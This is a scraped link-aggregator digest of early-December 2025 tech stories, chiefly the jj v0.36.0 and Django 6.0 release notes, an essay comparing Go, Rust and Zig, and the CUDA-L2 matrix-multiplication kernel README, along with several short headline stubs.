jujutsu v0.36.0 released

Lobsters
github.com
2025-12-04 21:46:54
Comments...
Original Article

About

jj is a Git-compatible version control system that is both simple and powerful. See
the installation instructions to get started.

Release highlights

  • The documentation has moved from https://jj-vcs.github.io/jj/ to
    https://docs.jj-vcs.dev/.

    301 redirects are being issued towards the new domain, so any existing links
    should not be broken.

  • Fixed race condition that could cause divergent operations when running
    concurrent jj commands in colocated repositories. It is now safe to
    continuously run e.g. jj log without --ignore-working-copy in one
    terminal while you're running other commands in another terminal.
    #6830

  • jj now ignores $PAGER set in the environment and uses less -FRX on most
    platforms (:builtin on Windows). See the docs for
    more information, and #3502 for
    motivation.

Breaking changes

  • In filesets or path patterns , glob matching
    is enabled by default. You can use cwd:"path" to match literal paths.

  • In the following commands, string pattern
    arguments
    are now parsed the same way they
    are in revsets and can be combined with logical operators: jj bookmark delete / forget / list / move , jj tag delete / list , jj git clone / fetch / push

  • In the following commands, unmatched bookmark/tag names no longer cause an
    error. A warning is printed instead: jj bookmark delete / forget / move / track / untrack , jj tag delete , jj git clone / push

  • The default string pattern syntax in revsets will be changed to glob: in a
    future release. You can opt in to the new default by setting
    ui.revsets-use-glob-by-default=true .

  • Upgraded scm-record from v0.8.0 to v0.9.0. See release notes at
    https://github.com/arxanas/scm-record/releases/tag/v0.9.0 .

  • The minimum supported Rust version (MSRV) is now 1.89.

  • On macOS, the deprecated config directory ~/Library/Application Support/jj
    is not read anymore. Use $XDG_CONFIG_HOME/jj instead (defaults to
    ~/.config/jj ).

  • Sub-repos are no longer tracked. Any directory containing .jj or .git
    is ignored. Note that Git submodules are unaffected by this.

Deprecations

  • The --destination / -d arguments for jj rebase , jj split , jj revert ,
    etc. were renamed to --onto / -o . The reasoning is that --onto ,
    --insert-before , and --insert-after are all destination arguments, so
    calling one of them --destination was confusing and unclear. The old names
    will be removed at some point in the future, but we realize that they are
    deep in muscle memory, so you can expect an unusually long deprecation period.

  • jj describe --edit is deprecated in favor of --editor .

  • The config options git.auto-local-bookmark and git.push-new-bookmarks are
    deprecated in favor of remotes.<name>.auto-track-bookmarks . For example:

    [remotes.origin]
    auto-track-bookmarks = "glob:*"

    For more details, refer to
    the docs .

  • The flag --allow-new on jj git push is deprecated. In order to push new
    bookmarks, please track them with jj bookmark track . Alternatively, consider
    setting up an auto-tracking configuration to avoid the chore of tracking
    bookmarks manually. For example:

    [remotes.origin]
    auto-track-bookmarks = "glob:*"

    For more details, refer to
    the docs .

New features

  • jj commit , jj describe , jj squash , and jj split now accept
    --editor , which ensures an editor will be opened with the commit
    description even if one was provided via --message / -m .

  • All jj commands show a warning when the provided fileset expression
    doesn't match any files.

  • Added files() template function to DiffStats . This supports per-file stats
    like lines_added() and lines_removed() .

  • Added join() template function. This is different from separate() in that
    it adds a separator between all arguments, even if empty.

  • RepoPath template type now has a absolute() -> String method that returns
    the absolute path as a string.

  • Added format_path(path) template that controls how file paths are printed
    with jj file list .

  • New built-in revset aliases visible() and hidden() .

  • Unquoted * is now allowed in revsets. bookmarks(glob:foo*) no longer
    needs quoting.

  • jj prev/next --no-edit now generates an error if the working copy has
    children.

  • A new config option remotes.<name>.auto-track-bookmarks can be set to a
    string pattern. New bookmarks matching it will be automatically tracked for
    the specified remote. See
    the docs .

  • jj log now supports a --count flag to print the number of commits instead
    of displaying them.

Fixed bugs

  • jj fix now prints a warning if a tool failed to run on a file.
    #7971

  • Shell completion now works with non‑normalized paths, fixing the previous
    panic and allowing prefixes containing . or .. to be completed correctly.
    #6861

  • Shell completion now always uses forward slashes to complete paths, even on
    Windows. This renders completion results viable when using jj in Git Bash.
    #7024

  • Unexpected keyword arguments now return a parse failure for the coalesce()
    and concat() templating functions.

  • The Nushell completion script documentation now includes the -f option,
    keeping it up to date.
    #8007

  • Ensured that with Git submodules, remnants of your submodules do not show up
    in the working copy after running jj new .
    #4349

Contributors

Thanks to the people who made this release happen!

Thoughts on Go vs. Rust vs. Zig

Hacker News
sinclairtarget.com
2025-12-04 21:40:24
Comments...
Original Article

Aug 09, 2025

I realized recently that rather than using “the right tool for the job” I’ve been using the tool at the job and that’s mostly determined the programming languages I know. So over the last couple months I’ve put a lot of time into experimenting with languages I don’t get to use at work. My goal hasn’t been proficiency; I’m more interested in forming an opinion on what each language is good for.

Programming languages differ along so many axes that it can be hard to compare them without defaulting to the obviously true but 1) entirely boring and 2) not-that-helpful conclusion that there are trade-offs. Of course there are trade-offs. The important question is, why did this language commit to this particular set of trade-offs?

That question is interesting to me because I don’t want to choose a language based on a list of features as if I were buying a humidifier. I care about building software and I care about my tools. In making the trade-offs they make, languages express a set of values. I’d like to find out which values resonate with me.

That question is also useful in clarifying the difference between languages that, at the end of the day, have feature sets that significantly overlap. If the number of questions online about “Go vs. Rust” or “Rust vs. Zig” is a reliable metric, people are confused. It’s hard to remember, say, that language X is better for writing web services because it has features a , b , and c whereas language Y only has features a and b . Easier, I think, to remember that language X is better for writing web services because language Y was designed by someone who hates the internet (let’s imagine) and believes we should unplug the whole thing.

I’ve collected here my impressions of the three languages I’ve experimented with lately: Go, Rust, and Zig. I’ve tried to synthesize my experience with each language into a sweeping verdict on what that language values and how well it executes on those values. This might be reductive, but, like, crystallizing a set of reductive prejudices is sort of what I’m trying to do here.

Go

Go is distinguished by its minimalism. It has been described as “a modern C.” Go isn’t like C, because it is garbage-collected and has a real run-time, but it is like C in that you can fit the whole language in your head.

You can fit the whole language in your head because Go has so few features. For a long time, Go was notorious for not having generics. That was finally changed in Go 1.18, but that was only after 12 years of people begging for generics to be added to the language. Other features common in modern languages, like tagged unions or syntactic sugar for error-handling, have not been added to Go.

It seems the Go development team has a high bar for adding features to the language. The end result is a language that forces you to write a lot of boilerplate code to implement logic that could be more succinctly expressed in another language. But the result is also a language that is stable over time and easy to read.

To give you another example of Go’s minimalism, consider Go’s slice type. Both Rust and Zig have a slice type, but these are fat pointers and fat pointers only. In Go, a slice is a fat pointer to a contiguous sequence in memory, but a slice can also grow, meaning that it subsumes the functionality of Rust’s Vec<T> type and Zig’s ArrayList . Also, since Go is managing your memory for you, Go will decide whether your slice’s backing memory lives on the stack or the heap; in Rust or Zig, you have to think much harder about where your memory lives.

Go’s origin myth, as I understand it, is basically this: Rob Pike was sick of waiting for C++ projects to compile and was sick of other programmers at Google making mistakes in those same C++ projects. Go is therefore simple where C++ is baroque. It is a language for the programming rank and file, designed to be sufficient for 90% of use cases while also being easy to understand, even (perhaps especially) when writing concurrent code.

I don’t use Go at work, but I think I should. Go is minimal in service of corporate collaboration. I don’t mean that as a slight—building software in a corporate environment has its own challenges, which Go solves for.

Rust

Where Go is minimalist, Rust is maximalist. A tagline often associated with Rust is “zero-cost abstractions.” I would amend that to read, “zero-cost abstractions, and lots of them!”

Rust has a reputation for being hard to learn. I agree with Jamie Brandon, who writes that it’s not lifetimes that make Rust difficult, it’s the number of concepts stuffed into the language. I’m not the first person to pick on this particular Github comment, but it perfectly illustrates the conceptual density of Rust:

The type Pin<&LocalType> implements Deref<Target = LocalType> but it doesn’t implement DerefMut . The types Pin and & are #[fundamental] so that an impl DerefMut for Pin<&LocalType>> is possible. You can use LocalType == SomeLocalStruct or LocalType == dyn LocalTrait and you can coerce Pin<Pin<&SomeLocalStruct>> into Pin<Pin<&dyn LocalTrait>> . (Indeed, two layers of Pin!!) This allows creating a pair of “smart pointers that implement CoerceUnsized but have strange behavior” on stable ( Pin<&SomeLocalStruct> and Pin<&dyn LocalTrait> become the smart pointers with “strange behavior” and they already implement CoerceUnsized ).

Of course, Rust isn’t trying to be maximalist the same way Go is trying to be minimalist. Rust is a complex language because what it’s trying to do is deliver on two goals—safety and performance—that are somewhat in tension.

The performance goal is self-explanatory. What “safety” means is less clear; at least it was to me, though maybe I’ve just been Python-brained for too long. “Safety” means “memory safety,” the idea that you shouldn’t be able to dereference an invalid pointer, or do a double-free, etc. But it also means more than that. A “safe” program avoids all undefined behavior (sometimes referred to as “UB”).

What is the dreaded UB? I think the best way to understand it is to remember that, for any running program, there are FATES WORSE THAN DEATH. If something goes wrong in your program, immediate termination is great actually! Because the alternative, if the error isn’t caught, is that your program crosses over into a twilight zone of unpredictability, where its behavior might be determined by which thread wins the next data race or by what garbage happens to be at a particular memory address. Now you have heisenbugs and security vulnerabilities. Very bad.

Rust tries to prevent UB without paying any run-time performance penalty by checking for it at compile-time. The Rust compiler is smart, but it’s not omniscient. For it to be able to check your code, it has to understand what your code will do at run-time. And so Rust has an expressive type system and a menagerie of traits that allow you to express, to the compiler, what in another language would just be the apparent run-time behavior of your code.

This makes Rust hard, because you can’t just do the thing! You have to find out Rust’s name for the thing—find the trait or whatever you need—then implement it as Rust expects you to. But if you do this, Rust can make guarantees about the behavior of your code that other languages cannot, which depending on your application might be crucial. It can also make guarantees about other people’s code, which makes consuming libraries easy in Rust and explains why Rust projects have almost as many dependencies as projects in the JavaScript ecosystem.

Zig

Of the three languages, Zig is the newest and least mature. As of this writing, Zig is only on version 0.14. Its standard library has almost zero documentation and the best way to learn how to use it is to consult the source code directly.

Although I don’t know if this is true, I like to think of Zig as a reaction to both Go and Rust. Go is simple because it obscures details about how the computer actually works. Rust is safe because it forces you to jump through its many hoops. Zig will set you free! In Zig, you control the universe and nobody can tell you what to do.

In both Go and Rust, allocating an object on the heap is as easy as returning a pointer to a struct from a function. The allocation is implicit. In Zig, you allocate every byte yourself, explicitly. (Zig has manual memory management.) You have more control here than you have even in C: To allocate bytes, you have to call alloc() on a specific kind of allocator, meaning you have to decide on the best allocator implementation for your use case.

In Rust, creating a mutable global variable is so hard that there are long forum discussions on how to do it. In Zig, you can just create one, no problem.

Undefined behavior is still important in Zig. Zig calls it “illegal behavior.” It tries to detect it at run-time and crash the program when it occurs. For those who might worry about the performance cost of these checks, Zig offers four different “release modes” that you can choose from when you build your program. In some of these, the checks are disabled. The idea seems to be that you can run your program enough times in the checked release modes to have reasonable confidence that there will be no illegal behavior in the unchecked build of your program. That seems like a highly pragmatic design to me.

Another difference between Zig and the other two languages is Zig’s relationship to object-oriented programming. OOP has been out of favor for a while now and both Go and Rust eschew class inheritance. But Go and Rust have enough support for other object-oriented programming idioms that you could still construct your program as a graph of interacting objects if you wanted to. Zig has methods, but no private struct fields and no language feature implementing run-time polymorphism (AKA dynamic dispatch), even though std.mem.Allocator is dying to be an interface. As best as I can tell, these exclusions are intentional; Zig is a language for data-oriented design .

One more thing I want to say about this, because I found it eye-opening: It might seem crazy to be building a programming language with manual memory management in 2025, especially when Rust has shown that you don’t even need garbage collection and can let the compiler do it for you. But this is a design choice very much related to the choice to exclude OOP features. In Go and Rust and so many other languages, you tend to allocate little bits of memory at a time for each object in your object graph. Your program has thousands of little hidden malloc()s and free()s, and therefore thousands of different lifetimes. This is RAII. In Zig, it might seem like manual memory management would require lots of tedious, error-prone bookkeeping, but that’s only if you insist on tying memory allocations to all your little objects. You could instead just allocate and free big chunks of memory at certain sensible points in your program (like at the start of each iteration of your event loop), and use that memory to hold the data you need to operate on. It’s this approach that Zig encourages.

Many people seem confused about why Zig should exist if Rust does already. It’s not just that Zig is trying to be simpler. I think this difference is the more important one. Zig wants you to excise even more object-oriented thinking from your code.

Zig has a fun, subversive feel to it. It’s a language for smashing the corporate class hierarchy (of objects). It’s a language for megalomaniacs and anarchists. I like it. I hope it gets to a stable release soon, though the Zig team’s current priority seems to be rewriting all of their dependencies . It’s not impossible they try to rewrite the Linux kernel before we see Zig 1.0.

AG Tish James Won’t Prosecute the Cops Who Killed Win Rozario

hellgate
hellgatenyc.com
2025-12-04 21:30:12
Shooting Rozario less than two minutes after entering his apartment wasn’t provably unjustified, a report by the Attorney General’s office concluded....
Original Article
AG Tish James Won’t Prosecute the Cops Who Killed Win Rozario
A still from the body-worn camera of Officer Matthew Cianfrocco the day he shot Win Rozario. (New York Attorney General’s Office)


8086 Microcode Explorer

Lobsters
nand2mario.github.io
2025-12-04 21:23:56
Comments...
Original Article

Browse all 512 micro-instructions. Hover the Binary, Move, and Action columns for decoded details and color-coded bit fields.

Source: Andrew Jenner’s 8086 microcode disassembly, based on Ken Shirriff's die photo.

Author: @nand2mario — December 2025

The Intel 8086 executes its machine instructions through microcode. This viewer presents an interactive listing of all 512 micro-instructions in the control ROM. Each micro-instruction is 21 bits wide, addressed by a 13-bit micro-address, and split into two parts: a Move field, which moves data between internal registers, and an Action field, which controls ALU operations, memory cycles, branching, and other control signals.

The microcode address is composed of two fields: the upper 9 bits AR and the lower 4 bits CR . In the viewer, the opcode/address field is shown as AR.CR[3:2] (binary). When the opcode is empty, the next micro-instruction follows sequentially. For short jumps (type 0 actions), AR remains unchanged and a 4-bit target is loaded into CR ; hovering the short-jump value highlights the target row. For long jumps (types 5 and 7), a separate Translation ROM maps a 4-bit destination code to a full 13-bit address, and both AR and CR are replaced with this translated value.
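
To make the split concrete, a short Python sketch (the addresses are made up; only the 9-bit/4-bit layout comes from the description above):

def split_micro_address(addr: int) -> tuple[int, int]:
    assert 0 <= addr < (1 << 13), "micro-addresses are 13 bits"
    ar = addr >> 4   # upper 9 bits
    cr = addr & 0xF  # lower 4 bits
    return ar, cr

def short_jump(addr: int, target: int) -> int:
    # Type-0 short jump: AR is unchanged, CR is replaced by a 4-bit target.
    ar, _ = split_micro_address(addr)
    return (ar << 4) | (target & 0xF)

ar, cr = split_micro_address(0b1011001100111)
print(f"AR={ar:09b} CR={cr:04b}")                     # AR=101100110 CR=0111
print(f"{short_jump(0b1011001100111, 0b0010):013b}")  # 1011001100010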

What is better: a lookup table or an enum type?

Lobsters
www.cybertec-postgresql.com
2025-12-04 21:12:03
Comments...

Django 6 Released

Hacker News
docs.djangoproject.com
2025-12-04 21:09:56
Comments...
Original Article

December 3, 2025

Welcome to Django 6.0!

These release notes cover the new features , as well as some backwards incompatible changes you should be aware of when upgrading from Django 5.2 or earlier. We’ve begun the deprecation process for some features .

See the How to upgrade Django to a newer version guide if you’re updating an existing project.

Python compatibility

Django 6.0 supports Python 3.12, 3.13, and 3.14. We highly recommend, and only officially support, the latest release of each series.

The Django 5.2.x series is the last to support Python 3.10 and 3.11.

Third-party library support for older versions of Django

Following the release of Django 6.0, we suggest that third-party app authors drop support for all versions of Django prior to 5.2. At that time, you should be able to run your package’s tests using python -Wd so that deprecation warnings appear. After making the deprecation warning fixes, your app should be compatible with Django 6.0.

What’s new in Django 6.0

Content Security Policy support

Built-in support for the Content Security Policy (CSP) standard is now available, making it easier to protect web applications against content injection attacks such as cross-site scripting (XSS). CSP allows declaring trusted sources of content by giving browsers strict rules about which scripts, styles, images, or other resources can be loaded.

CSP policies can now be enforced or monitored directly using built-in tools: headers are added via the ContentSecurityPolicyMiddleware , nonces are supported through the csp() context processor, and policies are configured using the SECURE_CSP and SECURE_CSP_REPORT_ONLY settings.

These settings accept Python dictionaries and support Django-provided constants for clarity and safety. For example:

from django.utils.csp import CSP

SECURE_CSP = {
    "default-src": [CSP.SELF],
    "script-src": [CSP.SELF, CSP.NONCE],
    "img-src": [CSP.SELF, "https:"],
}

The resulting Content-Security-Policy header would be set to:

default-src 'self'; script-src 'self' 'nonce-SECRET'; img-src 'self' https:

To get started, follow the CSP how-to guide . For in-depth guidance, see the CSP security overview and the reference docs , which include details about decorators to override or disable policies on a per-view basis.

Template Partials

The Django Template Language now supports template partials , making it easier to encapsulate and reuse small named fragments within a template file. The new tags {% partialdef %} and {% partial %} define a partial and render it, respectively.

Partials can also be referenced using the template_name#partial_name syntax with get_template() , render() , {% include %} , and other template-loading tools, enabling more modular and maintainable templates without needing to split components into separate files.

A migration guide is available if you’re updating from the django-template-partials third-party package.

Background Tasks

Django now includes a built-in Tasks framework for running code outside the HTTP request–response cycle. This enables offloading work, such as sending emails or processing data, to background workers.

The framework provides task definition, validation, queuing, and result handling. Django guarantees consistent behavior for creating and managing tasks, while the responsibility for running them continues to belong to external worker processes.

Tasks are defined using the task() decorator:

from django.core.mail import send_mail
from django.tasks import task


@task
def email_users(emails, subject, message):
    return send_mail(subject, message, None, emails)

Once defined, tasks can be enqueued through a configured backend:

email_users.enqueue(
    emails=["user@example.com"],
    subject="You have a message",
    message="Hello there!",
)

Backends are configured via the TASKS setting. The two built-in backends included in this release are primarily intended for development and testing.

Django handles task creation and queuing, but does not provide a worker mechanism to run tasks. Execution must be managed by external infrastructure, such as a separate process or service.

See Django’s Tasks framework for an overview and the Tasks reference for API details.

Adoption of Python’s modern email API

Email handling in Django now uses Python’s modern email API, introduced in Python 3.6. This API, centered around the email.message.EmailMessage class, offers a cleaner and Unicode-friendly interface for composing and sending emails. It replaces use of Python’s older legacy ( Compat32 ) API, which relied on lower-level MIME classes (from email.mime ) and required more manual handling of message structure and encoding.

Notably, the return type of the EmailMessage.message() method is now an instance of Python’s email.message.EmailMessage . This supports the same API as the previous SafeMIMEText and SafeMIMEMultipart return types, but is not an instance of those now-deprecated classes.

Minor features

django.contrib.admin

  • The Font Awesome Free icon set (version 6.7.2) is now used for the admin interface icons.

  • The new AdminSite.password_change_form attribute allows customizing the form used in the admin site password change view.

  • Message levels messages.DEBUG and messages.INFO now have distinct icons and CSS styling. Previously, both levels shared the same appearance as messages.SUCCESS . Given that ModelAdmin.message_user() uses messages.INFO by default, set the level to messages.SUCCESS to keep the previous icon and styling.

django.contrib.auth

  • The default iteration count for the PBKDF2 password hasher is increased from 1,000,000 to 1,200,000.

django.contrib.gis

django.contrib.postgres

django.contrib.staticfiles

  • ManifestStaticFilesStorage now ensures consistent path ordering in manifest files, making them more reproducible and reducing unnecessary diffs.

  • The collectstatic command now reports only a summary for skipped files (and for deleted files when using --clear ) at --verbosity 1. To see per-file details for either case, set --verbosity to 2 or higher.

Email

Internationalization

  • Added support and translations for the Haitian Creole language.

Management Commands

  • The startproject and startapp commands now create the custom target directory if it doesn’t exist.

  • Common utilities, such as django.conf.settings , are now automatically imported to the shell by default.

Migrations

  • Squashed migrations can now themselves be squashed before being transitioned to normal migrations.

  • Migrations now support serialization of zoneinfo.ZoneInfo instances.

  • Serialization of deconstructible objects now supports keyword arguments with names that are not valid Python identifiers.

Models

Pagination

Requests and Responses

  • Multiple Cookie headers are now supported for HTTP/2 requests when running with ASGI.

Templates

  • The new variable forloop.length is now available within a for loop.

  • The querystring template tag now consistently prefixes the returned query string with a ? , ensuring reliable link generation behavior.

  • The querystring template tag now accepts multiple positional arguments, which must be mappings, such as QueryDict or dict .

Tests

Backwards incompatible changes in 6.0

Database backend API

This section describes changes that may be needed in third-party database backends.

  • BaseDatabaseSchemaEditor and PostgreSQL backends no longer use CASCADE when dropping a column.

  • DatabaseOperations.return_insert_columns() and DatabaseOperations.fetch_returned_insert_rows() methods are renamed to returning_columns() and fetch_returned_rows() , respectively, to denote they can be used in the context of UPDATE RETURNING statements as well as INSERT RETURNING .

  • The DatabaseOperations.fetch_returned_insert_columns() method is removed and the fetch_returned_rows() method replacing fetch_returned_insert_rows() expects both a cursor and returning_params to be provided, just like fetch_returned_insert_columns() did.

  • If the database supports UPDATE RETURNING statements, backends can set DatabaseFeatures.can_return_rows_from_update=True .

Dropped support for MariaDB 10.5

Upstream support for MariaDB 10.5 ended in June 2025. Django 6.0 supports MariaDB 10.6 and higher.

Dropped support for Python < 3.12

Because Python 3.12 is now the minimum supported version for Django, any optional dependencies must also meet that requirement. The following versions of each library are the first to add or confirm compatibility with Python 3.12:

  • aiosmtpd 1.4.5

  • argon2-cffi 23.1.0

  • bcrypt 4.1.1

  • docutils 0.22

  • geoip2 4.8.0

  • Pillow 10.1.0

  • mysqlclient 2.2.1

  • numpy 1.26.0

  • PyYAML 6.0.2

  • psycopg 3.1.12

  • psycopg2 2.9.9

  • redis-py 5.1.0

  • selenium 4.23.0

  • sqlparse 0.5.0

  • tblib 3.0.0

Email

DEFAULT_AUTO_FIELD setting now defaults to BigAutoField

Since Django 3.2, when the DEFAULT_AUTO_FIELD setting was added, the default startproject template’s settings.py contained:

DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"

and the default startapp template’s AppConfig contained:

default_auto_field = "django.db.models.BigAutoField"

At that time, the default value of DEFAULT_AUTO_FIELD remained django.db.models.AutoField for backwards compatibility.

In Django 6.0, DEFAULT_AUTO_FIELD now defaults to django.db.models.BigAutoField and the aforementioned lines in the project and app templates are removed.

Most projects shouldn’t be affected, since Django 3.2 has raised the system check warning models.W042 for projects that don’t set DEFAULT_AUTO_FIELD .

If you haven’t dealt with this warning by now, add DEFAULT_AUTO_FIELD = 'django.db.models.AutoField' to your project’s settings, or default_auto_field = 'django.db.models.AutoField' to an app’s AppConfig , as needed.

Custom ORM expressions should return params as a tuple

Prior to Django 6.0, custom lookups and custom expressions implementing the as_sql() method (and its supporting methods process_lhs() and process_rhs() ) were allowed to return a sequence of params in either a list or a tuple. To address the interoperability problems that resulted, the second return element of the as_sql() method should now be a tuple:

def as_sql(self, compiler, connection) -> tuple[str, tuple]: ...

If your custom expressions support multiple versions of Django, you should adjust any pre-processing of parameters to be resilient against either tuples or lists. For instance, prefer unpacking like this:

params = (*lhs_params, *rhs_params)
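
For illustration, a minimal custom lookup written against the new contract might look like the following; the NotEqual lookup itself is just an example, the point being the tuple of params:

from django.db.models import Field, Lookup

class NotEqual(Lookup):
    lookup_name = "ne"

    def as_sql(self, compiler, connection):
        lhs, lhs_params = self.process_lhs(compiler, connection)
        rhs, rhs_params = self.process_rhs(compiler, connection)
        # Unpacking copes with lhs/rhs params arriving as either lists
        # (older Django) or tuples, and returns a tuple as now required.
        params = (*lhs_params, *rhs_params)
        return f"{lhs} <> {rhs}", params

Field.register_lookup(NotEqual)
# Usage: Author.objects.filter(name__ne="anonymous")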

Miscellaneous

  • The JSON serializer now writes a newline at the end of the output, even without the indent option set.

  • The minimum supported version of asgiref is increased from 3.8.1 to 3.9.1.

Features deprecated in 6.0

Positional arguments in django.core.mail APIs

django.core.mail APIs now require keyword arguments for less commonly used parameters. Using positional arguments for these now emits a deprecation warning and will raise a TypeError when the deprecation period ends.

Miscellaneous

  • BaseDatabaseCreation.create_test_db(serialize) is deprecated. Use serialize_db_to_string() instead.

  • The PostgreSQL StringAgg class is deprecated in favor of the generally available StringAgg class.

  • The PostgreSQL OrderableAggMixin is deprecated in favor of the order_by attribute now available on the Aggregate class.

  • The default protocol in urlize and urlizetrunc will change from HTTP to HTTPS in Django 7.0. Set the transitional setting URLIZE_ASSUME_HTTPS to True to opt into assuming HTTPS during the Django 6.x release cycle.

  • The URLIZE_ASSUME_HTTPS transitional setting is deprecated.

  • Setting ADMINS or MANAGERS to a list of (name, address) tuples is deprecated. Set to a list of email address strings instead. Django never used the name portion. To include a name, format the address string as '"Name" <address>' or use Python’s email.utils.formataddr() .

  • Support for the orphans argument being larger than or equal to the per_page argument of django.core.paginator.Paginator and django.core.paginator.AsyncPaginator is deprecated.

  • Using a percent sign in a column alias or annotation is deprecated.

  • Support for passing Python’s legacy email MIMEBase object to EmailMessage.attach() (or including one in the message’s attachments list) is deprecated. For complex attachments requiring additional headers or parameters, switch to the modern email API’s MIMEPart .

  • The django.core.mail.BadHeaderError exception is deprecated. Python’s modern email raises a ValueError for email headers containing prohibited characters.

  • The django.core.mail.SafeMIMEText and SafeMIMEMultipart classes are deprecated.

  • The undocumented django.core.mail.forbid_multi_line_headers() and django.core.mail.message.sanitize_address() functions are deprecated.

Features removed in 6.0

These features have reached the end of their deprecation cycle and are removed in Django 6.0.

See Features deprecated in 5.0 for details on these changes, including how to remove usage of these features.

  • Support for passing positional arguments to BaseConstraint is removed.

  • The DjangoDivFormRenderer and Jinja2DivFormRenderer transitional form renderers are removed.

  • BaseDatabaseOperations.field_cast_sql() is removed.

  • request is required in the signature of ModelAdmin.lookup_allowed() subclasses.

  • Support for calling format_html() without passing args or kwargs is removed.

  • The default scheme for forms.URLField has changed from "http" to "https" .

  • The FORMS_URLFIELD_ASSUME_HTTPS transitional setting is removed.

  • The django.db.models.sql.datastructures.Join no longer falls back to get_joining_columns() .

  • The get_joining_columns() method of ForeignObject and ForeignObjectRel is removed.

  • The ForeignObject.get_reverse_joining_columns() method is removed.

  • Support for cx_Oracle is removed.

  • The ChoicesMeta alias to django.db.models.enums.ChoicesType is removed.

  • The Prefetch.get_current_queryset() method is removed.

  • The get_prefetch_queryset() method of related managers and descriptors is removed.

  • get_prefetcher() and prefetch_related_objects() no longer fall back to get_prefetch_queryset() .

See Features deprecated in 5.1 for details on these changes, including how to remove usage of these features.

  • django.urls.register_converter() no longer allows overriding existing converters.

  • The ModelAdmin.log_deletion() and LogEntryManager.log_action() methods are removed.

  • The undocumented django.utils.itercompat.is_iterable() function and the django.utils.itercompat module are removed.

  • The django.contrib.gis.geoip2.GeoIP2.coords() method is removed.

  • The django.contrib.gis.geoip2.GeoIP2.open() method is removed.

  • Support for passing positional arguments to Model.save() and Model.asave() is removed.

  • The setter for django.contrib.gis.gdal.OGRGeometry.coord_dim is removed.

  • The check keyword argument of CheckConstraint is removed.

  • The get_cache_name() method of FieldCacheMixin is removed.

  • The OS_OPEN_FLAGS attribute of FileSystemStorage is removed.

CUDA-L2: Surpassing cuBLAS Performance for Matrix Multiplication Through RL

Hacker News
github.com
2025-12-04 21:04:29
Comments...
Original Article

CUDA-L2: Surpassing cuBLAS Performance for Matrix Multiplication through Reinforcement Learning

CUDA-L2: Surpassing cuBLAS Performance for Matrix Multiplication through Reinforcement Learning

🥳 Introduction

CUDA-L2 is a system that combines large language models (LLMs) and reinforcement learning (RL) to automatically optimize Half-precision General Matrix Multiply (HGEMM) CUDA kernels. CUDA-L2 systematically outperforms major matmul baselines to date, from the widely-used torch.matmul to state-of-the-art NVIDIA closed-source libraries (cuBLAS, cuBLASLt-heuristic, cuBLASLt-AutoTuning). Paper

Speedup of CUDA-L2 over torch.matmul, cuBLAS, cuBLASLt-heuristic, and cuBLASLt-AutoTuning across 1000 (M,N,K) configurations on A100.

Speedup comparison results across 1000 (M,N,K) configurations on A100.

🎉 What's New

  • [Dec 2, 2025] Released A100 optimized HGEMM kernels across 1,000 configurations.

🗒️ To-Do List

  • Release HGEMM with 32-bit accumulator (SM80_16x8x16_F16F16F16F32 and F32F16F16F32 officially) for A100. The current version only supports a 16-bit accumulator (SM80_16x8x16_F16F16F16F16).
  • Support denser matrix configurations.
  • Extend to more GPUs (Ada Lovelace, Hopper, Blackwell).
  • Easy deployment for open-source LLMs.

FAQ

Q: Do A100 kernels apply to other machines like RTX 3090 or H100?

A: Ideally, kernels trained on A100 should only be used on A100 if you are targeting speedup. They might have speedup on other machines, but it's not guaranteed. We will progressively release kernels trained on different machines.

Q: What if I need matrix dimensions (M, N, K) not found in your configurations?

A: 1. You can find the nearest neighbor configuration (larger than yours) and pad with zeros. 2. Feel free to post your dimensions on GitHub issues. We are happy to release kernels for your configuration.
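
A sketch of that padding workaround in PyTorch; padded_matmul and the dimensions are illustrative, and hgemm stands in for whichever released CUDA-L2 kernel you load (defaulting here to torch.matmul):

import torch
import torch.nn.functional as F

def padded_matmul(a, b, M_cfg, N_cfg, K_cfg, hgemm=torch.matmul):
    # Zero-pad the (M, K) x (K, N) operands up to a released configuration,
    # run the kernel, then slice the valid block back out. Zero padding
    # leaves the top-left M x N block of the product unchanged.
    M, K = a.shape
    K2, N = b.shape
    assert K == K2 and M <= M_cfg and N <= N_cfg and K <= K_cfg
    a_p = F.pad(a, (0, K_cfg - K, 0, M_cfg - M))  # (last dim pads, then first dim)
    b_p = F.pad(b, (0, N_cfg - N, 0, K_cfg - K))
    return hgemm(a_p, b_p)[:M, :N]

a = torch.randn(60, 60, dtype=torch.half, device="cuda")
b = torch.randn(60, 4000, dtype=torch.half, device="cuda")
c = padded_matmul(a, b, 64, 4096, 64)  # nearest released config: 64_4096_64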

Installation & Setup

1. Prerequisites

  • Python : Ensure you have a working Python environment.
  • PyTorch : This project requires PyTorch version 2.6.0 or higher.

2. Clone CUTLASS

This project depends on NVIDIA CUTLASS. You must clone the specific tag v4.2.1 into a directory named cutlass:

git clone -b v4.2.1 https://github.com/NVIDIA/cutlass.git cutlass

⚠️ Warning : Please ensure you download the correct CUTLASS version ( v4.2.1 ) and set the CUTLASS_DIR environment variable correctly. Incorrect CUTLASS setup may cause the project to fail silently or produce no results.

3. Environment Variables

Before building or running the project, you must configure the following environment variables:

  • CUTLASS_DIR : Points to the directory where you cloned CUTLASS.
  • TORCH_CUDA_ARCH_LIST : Specifies the target GPU architecture (e.g., "8.0" for NVIDIA Ampere / A100 / RTX 30 series).

Run the following commands:

export CUTLASS_DIR=/path/to/your/cutlass
export TORCH_CUDA_ARCH_LIST="8.0"

Usage

To run the evaluation, use the eval_one_file.sh script. Below is an example command for offline mode:

./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode offline

For server mode, you need to specify --target_qps :

./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode server --target_qps 100

Arguments Reference

  • --mnk : The problem size (e.g., 64_4096_64 ).
  • --warmup_seconds : Duration of warmup in seconds before timing.
  • --benchmark_seconds : Duration of benchmarking in seconds.
  • --base_dir : Directory to save the compile and output results.
  • --gpu_device_id : The ID of the GPU to use (e.g., 7 ).
  • --mode : Execution mode. offline runs the evaluation in offline/batch processing mode; server runs it in server mode (simulating request-based scenarios).
  • --target_qps : Target Queries Per Second (QPS) for server mode. Required if --mode is server .

✉️ Contact

If you have any questions, please open a GitHub issue or reach out to us at jiwei_li@deep-reinforce.com.

Plane crashed after 3D-printed part collapsed

Hacker News
www.bbc.com
2025-12-04 20:56:08
Comments...
Original Article

By Maisie Lillywhite, Gloucestershire


The sole crew member sustained minor injuries in the crash, which destroyed the light aircraft

